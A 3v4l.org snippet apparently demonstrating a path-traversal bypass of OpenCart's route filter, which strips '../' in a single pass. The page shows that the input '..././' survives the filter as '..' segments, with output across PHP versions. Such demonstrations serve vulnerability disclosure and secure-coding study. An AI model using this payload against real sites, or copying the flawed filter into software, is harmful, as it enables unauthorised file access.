3v4l.org

run code in 300+ PHP versions simultaneously
<?php // What OpenCart expects people to try: $route = 'apple/../../../../dog'; $parts = explode('/', str_replace('../', '', (string)$route)); var_dump($parts); // How to bypass their protection: $route = 'apple/..././..././..././..././dog'; $parts = explode('/', str_replace('../', '', (string)$route)); var_dump($parts);
Output for 4.3.0 - 4.3.11, 4.4.0 - 4.4.9, 5.0.0 - 5.0.5, 5.1.0 - 5.1.6, 5.2.0 - 5.2.17, 5.3.0 - 5.3.29, 5.4.0 - 5.4.45, 5.5.0 - 5.5.38, 5.6.0 - 5.6.30, 7.0.0 - 7.0.29, 7.1.0 - 7.1.20, 7.2.0 - 7.2.33, 7.3.16 - 7.3.28, 7.4.0 - 7.4.16, 8.0.0 - 8.0.3
array(2) { [0]=> string(5) "apple" [1]=> string(3) "dog" } array(6) { [0]=> string(5) "apple" [1]=> string(2) ".." [2]=> string(2) ".." [3]=> string(2) ".." [4]=> string(2) ".." [5]=> string(3) "dog" }